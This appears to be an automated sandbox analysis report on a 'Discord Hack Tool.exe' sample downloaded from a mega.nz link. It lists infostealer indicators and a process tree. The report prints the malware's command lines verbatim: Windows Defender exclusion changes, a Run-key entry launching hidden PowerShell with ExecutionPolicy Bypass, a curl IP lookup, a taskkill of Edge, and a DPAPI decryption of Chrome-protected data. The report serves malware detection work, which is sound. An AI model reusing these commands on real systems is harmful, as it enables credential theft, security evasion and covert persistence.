Analysis
-
max time kernel
58s -
max time network
66s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
02/11/2024, 10:16
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU
Resource
win11-20241007-en
General
-
Target
https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 68 2340 curl.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2684 powershell.exe 5692 powershell.exe 5488 powershell.exe 2144 powershell.exe 676 powershell.exe -
Clipboard Data 1 TTPs 1 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 792 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 5240 Discord Hack Tool.exe -
Loads dropped DLL 1 IoCs
pid Process 5240 Discord Hack Tool.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\kNPBRiEUjxJrLAI.ps1\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\Downloads\\Discord Hack Tool.exe" reg.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 792 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 13 discord.com 63 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 6132 cmd.exe 2776 cmd.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3164 tasklist.exe 4528 tasklist.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 17 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1900 WMIC.exe 3352 WMIC.exe 5540 WMIC.exe 6128 WMIC.exe 3408 WMIC.exe 5540 WMIC.exe 3204 WMIC.exe 5568 WMIC.exe 5556 WMIC.exe 4796 WMIC.exe 1508 WMIC.exe 4676 WMIC.exe 3356 WMIC.exe 1400 WMIC.exe 5908 WMIC.exe 4236 WMIC.exe 976 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 5952 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 5652 reg.exe 5276 reg.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 111331.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5292 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid Process 4364 msedge.exe 4364 msedge.exe 5728 msedge.exe 5728 msedge.exe 3048 identity_helper.exe 3048 identity_helper.exe 5284 msedge.exe 5284 msedge.exe 2240 msedge.exe 2240 msedge.exe 5488 powershell.exe 5488 powershell.exe 5488 powershell.exe 1004 powershell.exe 1004 powershell.exe 1004 powershell.exe 2760 powershell.exe 2760 powershell.exe 2760 powershell.exe 676 powershell.exe 676 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 3740 powershell.exe 3740 powershell.exe 3740 powershell.exe 5692 powershell.exe 5692 powershell.exe 5692 powershell.exe 3620 powershell.exe 3620 powershell.exe 3620 powershell.exe 5252 powershell.exe 5252 powershell.exe 2144 powershell.exe 880 powershell.exe 880 powershell.exe 2144 powershell.exe 2144 powershell.exe 880 powershell.exe 6008 powershell.exe 6008 powershell.exe 2216 powershell.exe 2216 powershell.exe 412 powershell.exe 412 powershell.exe 5672 powershell.exe 5672 powershell.exe 4996 powershell.exe 4996 powershell.exe 4256 powershell.exe 4256 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: 33 5516 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 5516 AUDIODG.EXE Token: SeDebugPrivilege 5488 powershell.exe Token: SeDebugPrivilege 3164 tasklist.exe Token: SeDebugPrivilege 5952 taskkill.exe Token: SeDebugPrivilege 4528 tasklist.exe Token: SeDebugPrivilege 1004 powershell.exe Token: SeDebugPrivilege 2760 powershell.exe Token: SeIncreaseQuotaPrivilege 5732 WMIC.exe Token: SeSecurityPrivilege 5732 WMIC.exe Token: SeTakeOwnershipPrivilege 5732 WMIC.exe Token: SeLoadDriverPrivilege 5732 WMIC.exe Token: SeSystemProfilePrivilege 5732 WMIC.exe Token: SeSystemtimePrivilege 5732 WMIC.exe Token: SeProfSingleProcessPrivilege 5732 WMIC.exe Token: SeIncBasePriorityPrivilege 5732 WMIC.exe Token: SeCreatePagefilePrivilege 5732 WMIC.exe Token: SeBackupPrivilege 5732 WMIC.exe Token: SeRestorePrivilege 5732 WMIC.exe Token: SeShutdownPrivilege 5732 WMIC.exe Token: SeDebugPrivilege 5732 WMIC.exe Token: SeSystemEnvironmentPrivilege 5732 WMIC.exe Token: SeRemoteShutdownPrivilege 5732 WMIC.exe Token: SeUndockPrivilege 5732 WMIC.exe Token: SeManageVolumePrivilege 5732 WMIC.exe Token: 33 5732 WMIC.exe Token: 34 5732 WMIC.exe Token: 35 5732 WMIC.exe Token: 36 5732 WMIC.exe Token: SeIncreaseQuotaPrivilege 5732 WMIC.exe Token: SeSecurityPrivilege 5732 WMIC.exe Token: SeTakeOwnershipPrivilege 5732 WMIC.exe Token: SeLoadDriverPrivilege 5732 WMIC.exe Token: SeSystemProfilePrivilege 5732 WMIC.exe Token: SeSystemtimePrivilege 5732 WMIC.exe Token: SeProfSingleProcessPrivilege 5732 WMIC.exe Token: SeIncBasePriorityPrivilege 5732 WMIC.exe Token: SeCreatePagefilePrivilege 5732 WMIC.exe Token: SeBackupPrivilege 5732 WMIC.exe Token: SeRestorePrivilege 5732 WMIC.exe Token: SeShutdownPrivilege 5732 WMIC.exe Token: SeDebugPrivilege 5732 WMIC.exe Token: SeSystemEnvironmentPrivilege 5732 WMIC.exe Token: SeRemoteShutdownPrivilege 5732 WMIC.exe Token: SeUndockPrivilege 5732 WMIC.exe Token: SeManageVolumePrivilege 5732 WMIC.exe Token: 33 5732 WMIC.exe Token: 34 5732 WMIC.exe Token: 35 5732 WMIC.exe Token: 36 5732 WMIC.exe Token: SeIncreaseQuotaPrivilege 464 WMIC.exe Token: SeSecurityPrivilege 464 WMIC.exe Token: SeTakeOwnershipPrivilege 464 WMIC.exe Token: SeLoadDriverPrivilege 464 WMIC.exe Token: SeSystemProfilePrivilege 464 WMIC.exe Token: SeSystemtimePrivilege 464 WMIC.exe Token: SeProfSingleProcessPrivilege 464 WMIC.exe Token: SeIncBasePriorityPrivilege 464 WMIC.exe Token: SeCreatePagefilePrivilege 464 WMIC.exe Token: SeBackupPrivilege 464 WMIC.exe Token: SeRestorePrivilege 464 WMIC.exe Token: SeShutdownPrivilege 464 WMIC.exe Token: SeDebugPrivilege 464 WMIC.exe Token: SeSystemEnvironmentPrivilege 464 WMIC.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe 5728 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5728 wrote to memory of 2972 5728 msedge.exe 77 PID 5728 wrote to memory of 2972 5728 msedge.exe 77 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 3128 5728 msedge.exe 78 PID 5728 wrote to memory of 4364 5728 msedge.exe 79 PID 5728 wrote to memory of 4364 5728 msedge.exe 79 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 PID 5728 wrote to memory of 2056 5728 msedge.exe 80 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5728 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffac1093cb8,0x7ffac1093cc8,0x7ffac1093cd82⤵PID:2972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1828 /prefetch:22⤵PID:3128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:82⤵PID:2056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:12⤵PID:1496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:12⤵PID:1544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5072 /prefetch:82⤵PID:2216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:12⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:12⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:12⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:12⤵PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:12⤵PID:1624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6196 /prefetch:82⤵PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5588 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2240
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4668
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:396
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C81⤵
- Suspicious use of AdjustPrivilegeToken
PID:5516
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3304
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:904
-
C:\Users\Admin\Downloads\Discord Hack Tool.exe"C:\Users\Admin\Downloads\Discord Hack Tool.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5240 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"2⤵PID:972
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "3⤵PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5488 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.cmdline"4⤵PID:2180
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5743.tmp" "c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\CSCFE21C5C5317A4A3B81B3616149D2A28F.TMP"5⤵PID:3732
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5100
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5896
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"2⤵PID:3452
-
C:\Windows\system32\taskkill.exetaskkill /IM msedge.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2360
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:6132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
-
